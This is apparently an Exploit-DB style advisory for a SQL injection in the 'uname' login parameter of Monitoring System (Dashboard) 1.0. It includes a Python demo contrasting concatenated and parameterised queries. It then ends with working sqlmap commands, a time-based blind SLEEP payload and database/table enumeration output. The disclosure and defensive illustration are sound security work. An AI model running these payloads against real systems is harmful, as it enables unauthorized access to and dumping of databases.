Vendor: Monitoring System (Dashboard)
By: Richard Jones
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Monitoring System (Dashboard)
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:monitoring_system_(dashboard)
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
Year: 2021

Monitoring System (Dashboard) 1.0 – ‘uname’ SQL Injection

A SQL injection vulnerability in Monitoring System (Dashboard) 1.0 allows an attacker to inject SQL through the 'uname' parameter of the login.php page. By exploiting it, an attacker can gain access to the database and dump its contents.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
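Validation alone is a weak control for this bug class; the fix that removes it outright is a parameterised (prepared) query, in which the 'uname' and 'upass' values are sent as data rather than spliced into the SQL text. The following Python script is an added illustration, not code from the advisory or from the Monitoring System application (whose login.php source is not reproduced on this page). It builds a small in-memory SQLite table with constructed sample rows, runs the same login check once with string concatenation and once with parameters, and feeds both the quoting structure of the advisory's 'uname' probe. The MySQL-only SLEEP() subquery from the payload is dropped because SQLite has no such function; table and column names are assumed.

```python
import sqlite3

# Constructed sample data (names and values assumed, not from the real schema).
SAMPLE_ACCOUNTS = [("alice", "s3cret")]  # plaintext only to keep the demo short


def make_db():
    """Create an in-memory SQLite database holding a minimal 'accounts' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (uname TEXT, upass TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return conn


def vulnerable_login(conn, uname, upass):
    """Login check built by string concatenation.

    The 'uname' value becomes part of the SQL text, so a quote in it ends the
    string literal and whatever follows is parsed as SQL (the CWE-89 pattern
    behind the advisory). Returns (executed SQL, matching row count).
    """
    sql = ("SELECT COUNT(*) FROM accounts WHERE uname = '" + uname
           + "' AND upass = '" + upass + "'")
    return sql, conn.execute(sql).fetchone()[0]


def safe_login(conn, uname, upass):
    """Same check as a parameterised query.

    The SQL text is fixed; the driver passes uname and upass as bound values,
    so quotes and keywords inside them are compared literally, never parsed.
    """
    sql = "SELECT COUNT(*) FROM accounts WHERE uname = ? AND upass = ?"
    return sql, conn.execute(sql, (uname, upass)).fetchone()[0]


def breaks_query(login_fn, uname):
    """True if a stray quote in 'uname' reaches the SQL parser and causes a
    syntax error, i.e. the input is being interpreted as SQL."""
    conn = make_db()
    try:
        login_fn(conn, uname, "w")
    except sqlite3.OperationalError:
        return True
    return False


def demo():
    """Compare both implementations on a normal login and on a probe shaped
    like the advisory payload (quote break plus an attacker-controlled AND
    clause, without the MySQL SLEEP() subquery)."""
    conn = make_db()
    probe = "a' AND 'YWTS'='YWTS"
    results = {}

    results["vuln_normal"] = vulnerable_login(conn, "alice", "s3cret")[1]
    results["safe_normal"] = safe_login(conn, "alice", "s3cret")[1]

    sql, count = vulnerable_login(conn, probe, "w")
    results["vuln_probe_count"] = count
    # The client-supplied clause is now part of the executed WHERE clause; a
    # SLEEP() in that position is exactly what sqlmap's time-based test measures.
    results["vuln_probe_clause_injected"] = "AND 'YWTS'='YWTS'" in sql

    sql, count = safe_login(conn, probe, "w")
    results["safe_probe_count"] = count
    # The executed SQL text is unchanged; the probe was just a username lookup.
    results["safe_probe_clause_injected"] = "YWTS" in sql

    results["vuln_quote_breaks"] = breaks_query(vulnerable_login, "a'")
    results["safe_quote_breaks"] = breaks_query(safe_login, "a'")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Both implementations accept the valid login and reject the probe as a username, so behaviour on normal input looks identical; the difference is that only the concatenated version lets the client rewrite the query, which is what a time-based blind payload relies on. The same pattern applies to PHP's mysqli or PDO prepared statements in the affected application.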

Exploit-DB raw data:

# Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Steps:

1. Run sqlmap:
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch

2. sqlmap output:
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin=


Exploit paths: 

Database: 
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs

Tables: 
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables
[11 tables]
+------------+
| accounts   |
| attendance |
| contacts   |
| employee   |
| gallery    |
| msexcel    |
| msppt      |
| msword     |
| oic        |
| random     |
| sign       |
+------------+